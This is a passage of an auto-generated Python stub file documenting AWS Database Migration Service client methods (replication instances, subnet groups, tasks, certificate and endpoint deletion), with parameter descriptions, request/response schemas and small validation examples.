Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceIdentifier: string
:param ReplicationInstanceIdentifier: **[REQUIRED]**
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
:type AllocatedStorage: integer
:param AllocatedStorage:
The amount of storage (in gigabytes) to be initially allocated for the replication instance.
:type ReplicationInstanceClass: string
:param ReplicationInstanceClass: **[REQUIRED]**
The compute and memory capacity of the replication instance as specified by the replication instance class.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds:
Specifies the VPC security group to be used with the replication instance. The VPC security group must work with the VPC containing the replication instance.
- *(string) --*
:type AvailabilityZone: string
:param AvailabilityZone:
The EC2 Availability Zone that the replication instance will be created in.
Default: A random, system-chosen Availability Zone in the endpoint\'s region.
Example: ``us-east-1d``
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier:
A subnet group to associate with the replication instance.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow:
The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC).
Format: ``ddd:hh24:mi-ddd:hh24:mi``
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type MultiAZ: boolean
:param MultiAZ:
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
:type EngineVersion: string
:param EngineVersion:
The engine version number of the replication instance.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade:
Indicates that minor engine upgrades will be applied automatically to the replication instance during the maintenance window.
Default: ``true``
:type Tags: list
:param Tags:
Tags to be associated with the replication instance.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:type KmsKeyId: string
:param KmsKeyId:
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type PubliclyAccessible: boolean
:param PubliclyAccessible:
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
:type DnsNameServers: string
:param DnsNameServers:
A list of DNS name servers supported for the replication instance.
:rtype: dict
:returns:
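The identifier constraints above can be checked client-side before issuing the request; a minimal sketch (the helper name and the sample arguments are illustrative, not part of boto3):

```python
import re

# Check the documented ReplicationInstanceIdentifier constraints:
# 1-63 alphanumeric characters or hyphens, starting with a letter,
# not ending with a hyphen, and with no consecutive hyphens.
def valid_replication_instance_id(identifier: str) -> bool:
    if not re.fullmatch(r"[A-Za-z][A-Za-z0-9-]{0,62}", identifier):
        return False
    return not identifier.endswith("-") and "--" not in identifier

# Hypothetical arguments; a real call would be
# client.create_replication_instance(**kwargs) on a configured DMS client.
kwargs = {
    "ReplicationInstanceIdentifier": "myrepinstance",
    "ReplicationInstanceClass": "dms.t2.micro",
}
assert valid_replication_instance_id(kwargs["ReplicationInstanceIdentifier"])
```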
"""
pass
def create_replication_subnet_group(self, ReplicationSubnetGroupIdentifier: str, ReplicationSubnetGroupDescription: str, SubnetIds: List, Tags: List = None) -> Dict:
"""
Creates a replication subnet group given a list of the subnet IDs in a VPC.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateReplicationSubnetGroup>`_
**Request Syntax**
::
response = client.create_replication_subnet_group(
ReplicationSubnetGroupIdentifier='string',
ReplicationSubnetGroupDescription='string',
SubnetIds=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ReplicationSubnetGroup** *(dict) --*
The replication subnet group that was created.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the Availability Zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier: **[REQUIRED]**
The name for the replication subnet group. This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters, periods, spaces, underscores, or hyphens. Must not be \"default\".
Example: ``mySubnetgroup``
:type ReplicationSubnetGroupDescription: string
:param ReplicationSubnetGroupDescription: **[REQUIRED]**
The description for the subnet group.
:type SubnetIds: list
:param SubnetIds: **[REQUIRED]**
The EC2 subnet IDs for the subnet group.
- *(string) --*
:type Tags: list
:param Tags:
The tag to be assigned to the subnet group.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
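The subnet group name constraints above can be validated before the call; a minimal sketch (the helper name and the sample arguments are illustrative, not part of boto3):

```python
import re

# Check the documented ReplicationSubnetGroupIdentifier constraints:
# no more than 255 alphanumeric characters, periods, spaces,
# underscores, or hyphens, and not the reserved word "default".
def valid_subnet_group_id(name: str) -> bool:
    if name.lower() == "default":
        return False
    return bool(re.fullmatch(r"[A-Za-z0-9. _-]{1,255}", name))

# Hypothetical arguments; a real call would be
# client.create_replication_subnet_group(**kwargs).
kwargs = {
    "ReplicationSubnetGroupIdentifier": "mySubnetgroup",
    "ReplicationSubnetGroupDescription": "demo subnet group",
    "SubnetIds": ["subnet-12345678"],
}
assert valid_subnet_group_id(kwargs["ReplicationSubnetGroupIdentifier"])
```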
"""
pass
def create_replication_task(self, ReplicationTaskIdentifier: str, SourceEndpointArn: str, TargetEndpointArn: str, ReplicationInstanceArn: str, MigrationType: str, TableMappings: str, ReplicationTaskSettings: str = None, CdcStartTime: datetime = None, CdcStartPosition: str = None, CdcStopPosition: str = None, Tags: List = None) -> Dict:
"""
Creates a replication task using the specified parameters.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateReplicationTask>`_
**Request Syntax**
::
response = client.create_replication_task(
ReplicationTaskIdentifier='string',
SourceEndpointArn='string',
TargetEndpointArn='string',
ReplicationInstanceArn='string',
MigrationType='full-load'|'cdc'|'full-load-and-cdc',
TableMappings='string',
ReplicationTaskSettings='string',
CdcStartTime=datetime(2015, 1, 1),
CdcStartPosition='string',
CdcStopPosition='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task that was created.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskIdentifier: string
:param ReplicationTaskIdentifier: **[REQUIRED]**
The replication task identifier.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
:type SourceEndpointArn: string
:param SourceEndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type TargetEndpointArn: string
:param TargetEndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type MigrationType: string
:param MigrationType: **[REQUIRED]**
The migration type.
:type TableMappings: string
:param TableMappings: **[REQUIRED]**
When using the AWS CLI or boto3, provide the path of the JSON file that contains the table mappings. Precede the path with \"file://\". When working with the DMS API, provide the JSON as the parameter value.
For example, --table-mappings file://mappingfile.json
:type ReplicationTaskSettings: string
:param ReplicationTaskSettings:
Settings for the task, such as target metadata settings. For a complete list of task settings, see `Task Settings for AWS Database Migration Service Tasks <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.CustomizingTasks.TaskSettings.html>`__ in the *AWS Database Migration User Guide.*
:type CdcStartTime: datetime
:param CdcStartTime:
Indicates the start time for a change data capture (CDC) operation. Use either CdcStartTime or CdcStartPosition to specify when you want a CDC operation to start. Specifying both values results in an error.
Timestamp Example: --cdc-start-time "2018-03-08T12:12:12"
:type CdcStartPosition: string
:param CdcStartPosition:
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position \"checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93\"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
:type CdcStopPosition: string
:param CdcStopPosition:
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
:type Tags: list
:param Tags:
Tags to be added to the replication instance.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
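The ``TableMappings`` value is a JSON string, so it is usually built with ``json.dumps``; a minimal sketch (the rule values and sample arguments are illustrative, not part of boto3):

```python
import json

# A minimal "select everything" table mapping serialized for the
# TableMappings parameter. The selection-rule layout shown here is a
# sketch; adjust the schema/table patterns for a real task.
table_mappings = json.dumps({
    "rules": [
        {
            "rule-type": "selection",
            "rule-id": "1",
            "rule-name": "include-all",
            "object-locator": {"schema-name": "%", "table-name": "%"},
            "rule-action": "include",
        }
    ]
})

# Hypothetical arguments; a real call would be
# client.create_replication_task(**kwargs) with real ARNs, and would set
# at most one of CdcStartTime / CdcStartPosition (supplying both fails).
kwargs = {
    "ReplicationTaskIdentifier": "mytask",
    "MigrationType": "full-load-and-cdc",
    "TableMappings": table_mappings,
}
```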
"""
pass
def delete_certificate(self, CertificateArn: str) -> Dict:
"""
Deletes the specified certificate.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteCertificate>`_
**Request Syntax**
::
response = client.delete_certificate(
CertificateArn='string'
)
**Response Syntax**
::
{
'Certificate': {
'CertificateIdentifier': 'string',
'CertificateCreationDate': datetime(2015, 1, 1),
'CertificatePem': 'string',
'CertificateWallet': b'bytes',
'CertificateArn': 'string',
'CertificateOwner': 'string',
'ValidFromDate': datetime(2015, 1, 1),
'ValidToDate': datetime(2015, 1, 1),
'SigningAlgorithm': 'string',
'KeyLength': 123
}
}
**Response Structure**
- *(dict) --*
- **Certificate** *(dict) --*
The Secure Sockets Layer (SSL) certificate.
- **CertificateIdentifier** *(string) --*
The customer-assigned name of the certificate. Valid characters are A-Z, a-z, and 0-9.
- **CertificateCreationDate** *(datetime) --*
The date that the certificate was created.
- **CertificatePem** *(string) --*
The contents of the .pem X.509 certificate file for the certificate.
- **CertificateWallet** *(bytes) --*
The location of the imported Oracle Wallet certificate for use with SSL.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) for the certificate.
- **CertificateOwner** *(string) --*
The owner of the certificate.
- **ValidFromDate** *(datetime) --*
The beginning date that the certificate is valid.
- **ValidToDate** *(datetime) --*
The final date that the certificate is valid.
- **SigningAlgorithm** *(string) --*
The signing algorithm for the certificate.
- **KeyLength** *(integer) --*
The key length of the cryptographic algorithm being used.
:type CertificateArn: string
:param CertificateArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the deleted certificate.
:rtype: dict
:returns:
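A certificate ARN can be sanity-checked before the delete call; a minimal sketch assuming the usual DMS ARN layout (the helper and the sample ARN are illustrative, not part of boto3):

```python
# Split a DMS certificate ARN of the assumed form
# arn:aws:dms:<region>:<account-id>:cert:<identifier>
# into its components (a convenience sketch, not part of boto3).
def certificate_arn_parts(arn: str) -> dict:
    parts = arn.split(":", 6)
    if len(parts) != 7 or parts[:3] != ["arn", "aws", "dms"] or parts[5] != "cert":
        raise ValueError("not a DMS certificate ARN: " + arn)
    return {"region": parts[3], "account": parts[4], "identifier": parts[6]}

# Hypothetical ARN; a real call would be
# client.delete_certificate(CertificateArn=arn).
arn = "arn:aws:dms:us-east-1:123456789012:cert:EXAMPLE123"
assert certificate_arn_parts(arn)["identifier"] == "EXAMPLE123"
```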
"""
pass
def delete_endpoint(self, EndpointArn: str) -> Dict:
"""
Deletes the specified endpoint.
.. note::
All tasks associated with the endpoint must be deleted before you can delete the endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DeleteEndpoint>`_
**Request Syntax**
::
response = client.delete_endpoint(
EndpointArn='string'
)
**Response Syntax**
::
{
'Endpoint': {
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
}
}
**Response Structure**
- *(dict) --*
- **Endpoint** *(dict) --*
The endpoint that was deleted.
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndpointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
A value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it in a subsequent cross-account call to CreateEndpoint.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server-side encryption you want to use for your data. This is part of the endpoint settings or the extra connection attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data that you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads, but writes become slower as the number of row groups grows. Defaults to 10,000 rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the maximum row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter that determines whether to use GZIP to compress the target files. To compress the files, set this value to ``GZIP`` . To keep the files uncompressed, set it to ``NONE`` (the default) or omit the parameter.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when ``AuthType=NO`` .
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be an integer greater than 0. Default value is 1000.
